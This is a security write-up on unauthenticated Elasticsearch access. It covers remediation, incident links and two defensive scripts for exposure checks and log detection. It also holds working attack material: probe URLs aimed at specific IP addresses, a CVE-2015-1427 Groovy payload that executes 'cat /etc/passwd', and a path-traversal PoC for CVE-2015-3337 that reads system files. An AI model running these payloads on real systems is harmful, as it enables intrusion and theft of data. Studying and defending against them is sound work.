Elasticsearch Unauthorized Access

This article covers the Elasticsearch unauthorized-access problem: a description of the issue, URLs that can be used to exploit it, and a set of remediation suggestions such as firewall rules, an Nginx reverse proxy and IP restrictions. It also lists related historical incidents and discusses the Groovy RCE CVE-2015-1427 in detail, with an example POST request.
0x00 Vulnerability description:

Elasticsearch is an enterprise search service written in Java. More and more companies run ELK for log analysis. Starting the service opens port 9200 by default with no authentication, so anyone who can reach the port can read and modify the data.

0x01 Some URLs used in exploitation
http://101.198.161.130:9200/_cat/indices/
http://101.198.161.130:9200/_plugin/head/
http://101.198.161.130:9200/_nodes
http://101.198.161.130:9200/_nodes?prettify
http://101.198.161.130:9200/_status
http://101.198.161.130:9200/_search?pretty
http://10.203.9.131:9200/zjftu/
http://10.203.9.131:9200/zjftu/_search?pretty
0x02 Remediation:

1. Block external access to port 9200 at the firewall.
2. Put Elasticsearch behind an Nginx reverse proxy and use the Nginx configuration to add authentication.
3. Restrict access by IP address and bind the service to a fixed IP.
4. Require authentication on port 9200 in config/elasticsearch.yml (the http.basic.* keys below are provided by the elasticsearch-http-basic plugin, not by stock Elasticsearch, so the plugin must be installed first):

    http.basic.enabled: true                            # switch; when on, the plugin handles every HTTP connection
    http.basic.user: "admin"                            # username
    http.basic.password: "admin_pw"                     # password (use a strong value in practice)
    http.basic.ipwhitelist: ["localhost", "127.0.0.1"]  # IP whitelist: addresses accepted without credentials
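After applying the four fixes above, the only sensible next step is to confirm from outside that the node no longer answers anonymous requests. The following script is an added example (it is not part of the original post) that sends unauthenticated requests for the management endpoints listed in 0x01 to a node you own and reports which of them still return data. It assumes a hardened node answers with 401/403 (proxy or http.basic plugin) or refuses the connection (firewall or bind-to-localhost); the endpoint list, the `fetch` injection point and the verdict names are this example's own choices.

```python
"""Post-hardening exposure check for an Elasticsearch node (added example).

Every anonymous request to a sensitive endpoint should either fail to connect
or be answered with 401/403. The default transport uses urllib; `fetch` can be
replaced with any callable returning (status, body) so the logic runs offline."""
import urllib.error
import urllib.request

# Endpoints from the post that disclose index names, node details or documents.
SENSITIVE_ENDPOINTS = ["/", "/_cat/indices/", "/_nodes", "/_status", "/_search?pretty", "/_plugin/head/"]


def default_fetch(url, timeout=5):
    """Return (HTTP status, body text); raise OSError when the host is unreachable."""
    req = urllib.request.Request(url, headers={"User-Agent": "es-exposure-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:  # 4xx/5xx are answers, not transport failures
        return err.code, err.read().decode("utf-8", "replace")


def classify(status):
    """Map a response status to one of the outcomes the hardening must produce."""
    if status in (401, 403):
        return "protected"    # proxy or plugin demanded credentials
    if status == 200:
        return "exposed"      # anonymous caller got data back
    return "unexpected"       # e.g. 404 from a proxy hiding ES entirely; review by hand


def audit_exposure(base_url, fetch=default_fetch):
    """Probe each sensitive endpoint anonymously and return {path: outcome}."""
    results = {}
    for path in SENSITIVE_ENDPOINTS:
        url = base_url.rstrip("/") + path
        try:
            status, _body = fetch(url)
        except OSError:       # refused / timed out: firewall or localhost binding is working
            results[path] = "unreachable"
            continue
        results[path] = classify(status)
    return results


def is_hardened(results):
    """True only when no endpoint answered an anonymous request with data."""
    return bool(results) and all(v in ("protected", "unreachable") for v in results.values())


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:9200"
    outcome = audit_exposure(target)
    for path, verdict in outcome.items():
        print(f"{verdict:12} {target}{path}")
    print("HARDENED" if is_hardened(outcome) else "STILL EXPOSED")
```

Run it from a host on the public side of the firewall as well as from inside the network: a node that is unreachable from outside but "exposed" from an internal workstation has only had fix 1 applied, and fixes 2 to 4 still matter.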
0x03 Historical incidents

Search SecPulse
Search the WooYun mirror
Search CNVD

1 360 Mobile: an Elasticsearch unauthorized-access issue (2016-04-19)
https://www.secpulse.com/archives/46394.html

2 Baofeng: Elasticsearch unauthorized access & Hadoop unauthorized access on one site (2016-04-27)
https://www.secpulse.com/archives/49115.html

3 Xinhuanet: misconfigured Elasticsearch on one channel's server / arbitrary operations possible / interviewee information exposed (2016-03-19)
https://www.secpulse.com/archives/46976.html

(Elasticsearch RCE)
4 神器而已's securities series: Jiuzhou Securities, Elasticsearch remote code execution on one site (2015-09-11 18:30)
(includes a few internal-network tricks)
https://www.secpulse.com/archives/39822.html

5 Funshion: misconfigured Elasticsearch on one site (arbitrary file read)
https://www.secpulse.com/archives/41126.html

6 A server in Shanghai: misconfigured Elasticsearch / arbitrary operations possible / large amount of sensitive data (over 7.9 million users' names, ID numbers, ethnicity, check-in and check-out times, room numbers, etc.) (2016-03-16)
https://www.secpulse.com/archives/46801.html

7 Guangxi Mobile: misconfigured Elasticsearch / arbitrary operations possible / large amount of sensitive data (users' phone numbers, IMEI, IMSI, online times, locations, etc.)
https://www.secpulse.com/archives/46798.html

0x04 Elasticsearch Groovy RCE (CVE-2015-1427)

Affected versions
The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script.

Send a POST request to the following URL:

http://127.0.0.1:9200/_search?pretty

with the following POST body:

{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}

A few other exploit write-ups

https://www.waitalone.cn/elasticsearch-exp.html
https://www.waitalone.cn/elasticsearch.html
http://www.freebuf.com/sectool/38025.html
http://blog.youkuaiyun.com/u011066706/article/details/51175761

0x05 es_poc_1.py
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import requests

host = "10.203.9.131"
port = 9200


def elastic_directoryTraversal(host, port):
    # Site plugins that were commonly served from /_plugin/<name>/ in ES 1.x
    pluginList = ['test', 'kopf', 'HQ', 'marvel', 'bigdesk', 'head']
    # Traversal paths: plain "../" and the overlong UTF-8 encoding of "." (%c0%ae)
    pList = ['/../../../../../../../../../../../../../../etc/passwd',
             '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd',
             '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini']
    for p in pluginList:
        for path in pList:
            urlA = "http://%s:%d/_plugin/%s%s" % (host, port, p, path)
            try:
                # .text (not .content) so the substring check below works on Python 3
                content = requests.get(urlA, timeout=5, allow_redirects=True, verify=False).text
                print(content)
                print("\n-------------------------------------------------------------\n")
                if "/root:/" in content:
                    print('Elasticsearch 任意文件读取漏洞(CVE-2015-3337) Found!')
            except Exception as e:
                print(e)


elastic_directoryTraversal(host, port)
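The three abuse patterns this post describes (anonymous reads of the management endpoints in 0x01, the Groovy `script_fields` payload of CVE-2015-1427 in 0x04, and the `/_plugin/` path traversal of CVE-2015-3337 in 0x05) all leave distinctive traces in the access log of the reverse proxy recommended in 0x02. The block below is an added example, not code from the original post: it runs detection logic for all three over constructed log lines. It assumes Nginx writes a custom tab-separated line per request (client IP, authenticated user or "-", method, path, status, request body or "-"); the log format, sample lines, regexes and finding names are this example's own assumptions.

```python
"""Detection of Elasticsearch abuse patterns in proxy access logs (added example)."""
import re
from urllib.parse import unquote

# Constructed sample lines in the assumed tab-separated format:
# client_ip <TAB> auth_user <TAB> method <TAB> path <TAB> status <TAB> request_body
SAMPLE_LOG = """\
203.0.113.7\t-\tGET\t/_cat/indices/\t200\t-
203.0.113.7\t-\tPOST\t/_search?pretty\t200\t{"size":1,"script_fields":{"x":{"script":"java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime()","lang":"groovy"}}}
198.51.100.9\t-\tGET\t/_plugin/head/../../../../../../etc/passwd\t200\t-
198.51.100.9\t-\tGET\t/_plugin/kopf/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd\t200\t-
10.0.0.5\tadmin\tGET\t/_nodes\t200\t-
10.0.0.5\tadmin\tPOST\t/logs-2016/_search\t200\t{"query":{"match_all":{}}}
203.0.113.7\t-\tGET\t/_nodes\t401\t-
"""

# Endpoints that expose cluster topology, index names or document contents.
SENSITIVE_PATHS = ("/_cat/", "/_nodes", "/_status", "/_search", "/_plugin/", "/_cluster/")
GROOVY_RE = re.compile(r'"lang"\s*:\s*"groovy"', re.IGNORECASE)
# Reflection / process-spawning tokens used to break out of the Groovy sandbox.
SANDBOX_ESCAPE_RE = re.compile(r"(Runtime|forName|ProcessBuilder|\.exec\()")
# Literal, percent-encoded and overlong-UTF-8 (%c0%ae) dot-dot segments.
TRAVERSAL_RE = re.compile(r"(\.\./|%2e%2e|%c0%ae)", re.IGNORECASE)


def parse_line(line):
    """Split one log line into a dict, or return None for malformed lines."""
    fields = line.rstrip("\n").split("\t")
    if len(fields) != 6 or not fields[4].isdigit():
        return None
    ip, user, method, path, status, body = fields
    return {"ip": ip, "user": user, "method": method, "path": path,
            "status": int(status), "body": body}


def classify(entry):
    """Return the list of findings for one parsed request (empty when benign)."""
    findings = []
    path, body = entry["path"], entry["body"]
    # CVE-2015-3337: traversal out of a site plugin directory. Overlong UTF-8 dots
    # do not decode to "..", so the raw path is checked as well as the decoded one.
    if path.startswith("/_plugin/") and (TRAVERSAL_RE.search(path) or "../" in unquote(path)):
        findings.append("plugin-path-traversal")
    # CVE-2015-1427: Groovy scripts in a search request; escalate when the body
    # reaches for reflection or Runtime, which no legitimate script field needs.
    if "_search" in path and body != "-" and GROOVY_RE.search(body):
        findings.append("groovy-script-rce" if SANDBOX_ESCAPE_RE.search(body) else "groovy-script")
    # Plain unauthorized access: anonymous client, sensitive endpoint, data returned.
    if entry["user"] == "-" and entry["status"] == 200 and any(p in path for p in SENSITIVE_PATHS):
        findings.append("unauthenticated-access")
    return findings


def analyze(log_text):
    """Run classify() over every line and return only the requests with findings."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line) if line.strip() else None
        if entry is None:
            continue
        findings = classify(entry)
        if findings:
            hits.append({"ip": entry["ip"], "path": entry["path"], "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in analyze(SAMPLE_LOG):
        print(f'{hit["ip"]:14} {", ".join(hit["findings"]):40} {hit["path"]}')
```

The `unauthenticated-access` rule only fires on a 200, so once the proxy enforces authentication the same requests show up as 401s and drop out of the report, which makes the rule a useful regression check for the hardening in 0x02 as well as an alert.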